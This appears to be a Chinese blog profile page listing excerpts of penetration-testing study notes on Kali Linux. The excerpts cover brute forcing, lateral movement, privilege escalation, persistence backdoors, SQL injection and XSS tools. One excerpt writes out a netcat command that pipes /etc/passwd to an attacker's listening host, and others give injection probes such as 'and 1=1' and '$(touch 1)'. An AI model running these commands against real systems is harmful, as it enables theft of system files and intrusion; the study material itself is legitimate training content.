自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(16)
  • 收藏
  • 关注

原创 Kali Linux渗透测试的暴力破解方法

暴力破解是一种常见的密码破解方法,通过尝试所有可能的密码组合,知道找到正确的密码为止,其难度取决于密码的复杂度和长度,以及破解工具的性能和设置。

2024-11-14 09:24:28 1184

原创 在Kali Linux中的内网横向渗透方法

虽然我们成功入侵目标主机并在其中安装了后门,但是我们入侵的目标主机只是网络中的一台,为了入侵网络中的其他主机,我们需要以入侵的主机位跳板,在网络中进行横向移动。

2024-11-06 09:42:21 871

原创 在Kali Linux中安装docker时遇到“指定软件找不到”情况的解决办法

注意:每个人的系统,电脑是不一样的,我也是实验了很多方法,尝试了很多Kali Linux的版本,最终于今天才弄清楚原理换源的原理,本人使用的是kali 2024.3,源具体使用的是哪一个不知道,本人将所有的源都注入,这样做的坏处就是占用资源,好处就是不需要一个一个试!将上述的内容复制粘贴到该源下,选择合适的源,不需要的直接使用 “#” 注释掉,如果后期需要将该井号键删除就行。源更换成功后,输入 “:wq!

2024-11-01 17:15:24 275

原创 在Kali Linux渗透测试中提权的方法

持久化交互式代理是一种在渗透测试中使用的技术,可以在目标主机上建立一个长期、可控隐蔽的代理连接,以便对目标主机展开进一步的渗透和攻击,它的优点是可以绕过防火墙和网络隔离,实现对内网系统的访问和控制,缺点是需要在目标主机的系统上植入后门程序或脚本,这可能会被杀毒软件和EDR软件发现。cat/etc/passwd|nc -vv Kali的主机IP地址 监听端口 #在目标主机上输入命令,可将/etc/passwd文件的内容保存到Kali 的主机使用Netcat工具监听时设置输出的pass.txt文件中。

2024-10-31 11:02:46 428

原创 在Kali Linux渗透测试中持久化方法

在渗透测试中,持久化是指攻击者在入侵系统后,为了保持对系统的控制,会在系统上留下一些后门或者其他的恶意代码,以确保在目标主机重启、用户凭证更改和系统访问中断后攻击者仍然可以随时重新访问系统,一般而言,持久化工具会为攻击者提供的功能有:维持或回复目标主机的访问权限或会话,无需再次利用漏洞再目标主机上执行任意命令、收集敏感信息、上传或下载文件、植入恶意软件等隐藏自己的痕迹,避免被目标主机的防御系统检测或清除扩大攻击范围,利用目标主机作为跳板,攻击其他内网主机。

2024-10-30 11:36:33 1176

原创 在Kali Linux渗透测试中提权的方法

使用Get-System提权:在终端输入命令Get-System,可以使用假冒令牌的方式将当前的线程的令牌提升为系统权限,可以通过Get-System-Whoami查看当前权限,也可以使用Get-System-Technique Token通过使用令牌复制功能将当前线程的令牌提升为系统权限。利用RunAs提权:在metasploit框架中,可以利用模块创建一个可执行的文件,然后将该文件发送到目标主机中运行,该文件在运行之前会提示用户是否继续运行,如果继续就会在框架中触发一个高权限的新用户会话。

2024-10-25 15:45:32 1092

原创 SQL注入检测方法与攻击方法

最简单的就是使用“and 1=1”和“and 1=2”,如果会被防火墙或自身逻辑拦截,可以尝试等价方法来变换payload,无论是采用哪种payload,最终要提交一个True和False语句,判断网页返回是否相同,从而来对比该位置是否存在SQL漏洞。证明攻击者拼接的起作用,这个位置是具有SQL注入漏洞的。基于时间的注入,顾名思义就是利用时间的长短来判断SQL注入点是否存在,根据时间长短来得到SQL语句执行结果是True还是False,通过判定是否延长来证明SQL注入漏洞是否存在。

2024-10-22 16:35:56 1016

原创 Windows和linux、macOS命令拼接符

第7行中,使用“||”符号连接两条命令时,在Linux系统下要求前一条命令出错,后面拼接的命令才可以执行。使用命令拼接符能够将多个命令组合成一个复杂的操作序列,实现更复杂的操作需求。*第6行中,“$(touch 1)”在Linux系统中拥有较高的执行优先级。

2024-10-21 17:07:33 356

原创 在Kali linux渗透测试中漏洞利用的方法

指的是Web应用或网站存在的一些设计或编码上的缺陷,攻击者可以利用他们来破坏Web应用或网站的正常功能,或者获取非法的访问权限或敏感信息,常见的Web漏洞如下:SQL漏洞:指Web应用或网站在处理用户输入时没有正确地过滤和转义特殊字符,导致用户输入被当作SQL语句的一部分执行,从而使操作数据库中的数据或执行其他命令。

2024-10-21 15:17:11 2313

原创 OWASP Top 10 (2021)

攻击方式:攻击者通过错误使用应用程序的身份认证和会话管理功能,能够破译密码、密钥或会话令牌,或者利用其他开发缺陷来暂时性或永久性冒充其他用户的身份,获取最高权限并进行攻击应用服务。其发布的最权威的“十项最严重的Web应用程序安全风险列表”,总结并更新Web应用程序中最可能,最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应该知道的知识。漏洞原因:安全配置错误漏洞是列表上最常见的漏洞,通常是由于操作者的不当配置(临时配置、开源云存储、http标头配置),使用默认配置或回显过多详细敏感信息的错误结果。

2024-10-20 08:45:55 1985

原创 在Kali Linux渗透测试-漏洞扫描的方法

CMS(content management system,内容管理系统),是一种位于web前端(web服务器)和后端办公系统或流程之间的软件系统,可以帮助公司管理数字内容,为存储内容的单一平台,借助内置的工作流程,为数字内容的写作式管理和创建提供自动化流程,并根据角色分配不同的权限和责任。耦合CMS:称为传统CMS,提供一个完全可访问的后端,可以连接和修改网站的数据库,并将内容发布到带有样式的前端,它需要专门的网站托管才能运行,还需要管理员对其进行设置并配置安装系统才可以持续使用。

2024-10-17 20:10:45 1474

原创 在Kali Linux渗透测试中信息收集的方法

本文来自于写手自己的学习笔记,新手小白,不足不好之处请谅解,也请指正,如果对你有帮助,它就存在意义,感谢!

2024-10-15 09:09:39 2179

转载 PowerSplloit使用

我们先下载PowerView.ps1脚本到本地,然后在当前目录下打开cmd,执行以下命令执行PowerView.ps1脚本中的Get-NetDomain模块,如果要执行该脚本的其他模块,亦是如此。该脚本在Exfiltration目录下,该文件的作用是复制一些系统无法复制的文件,比如sam文件。运行该脚本,该脚本会自动检查PowerUp.ps1下所有的模块,并在存在漏洞利用的模块下的AbuseFunction中直接给出利用方法。代码语言:javascript。代码语言:javascript。

2024-10-13 10:30:40 131

原创 Burp Suite的标签了解

pitchfork(叉子):允许设置多个payload,指同时处理两个位置,每个位置有各自的payload列表,他会按照不同的组合,将第一个和第二个payload进行配对。burp suite是一款集成了多种功能的Web应用渗透测试工具,可以帮助测试人员对Web应用进行拦截、分析、修改、重放、扫描、爆破、模糊测试等操作,从而发现和利用Web应用种的漏洞。Payloads:用户可以定义不同类型的payload,例如字典、数字范围、定制字符集等,这些payload可以被插入到请求的特定位置,测试目标的弱点。

2024-10-13 09:25:37 1090

原创 XSStrike的简单认识与使用

在检测到的payload下会显示efficiency、confidence,如果发现哪个payload可以成功利用,则会询问是否继续扫描。在浏览器访问URL地址时,将网站中的参数替换为扫描时输出的payload进行验证,可以看到URL地址存在的XSS漏洞。XSStrike是一个用于检测XSS漏洞的工具,可以检测反射型、DOM型XSS漏洞,集成了模糊匹配、多线程爬取、WAF绕过、Payload生成、XSS盲注以及通过字典文件枚举等功能。xsstrike -u “URL地址” --data “POST值”

2024-10-12 15:00:00 538

原创 XSSer简单了解与使用

XSSer(Cross Site Scripting Explorer)是一款自动化的XSS漏洞检测和利用工具,可以在Web应用中发现、利用、报告XSS漏洞,包含了多种选项,可以尝试绕过某些过滤器,并使用各种特殊技术进行代码注入,它通过自动化的工作流程帮助安全人员识别潜在的安全风险,并提供详细的报告,以增强网站的安全性。xsser -u “URL地址” -c “爬虫深度” --Cl “URL地址”xsser -u “URL地址” -g “路径和参数”自动检测URL指定的地址是否存在XSS漏洞。

2024-10-12 09:32:58 532

Windows信息安全和网络攻防笔记

包含木马、踩点扫描、漏洞分析、内核、网络通信、ssl协议以及IPv6的基础知识

2024-10-12

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除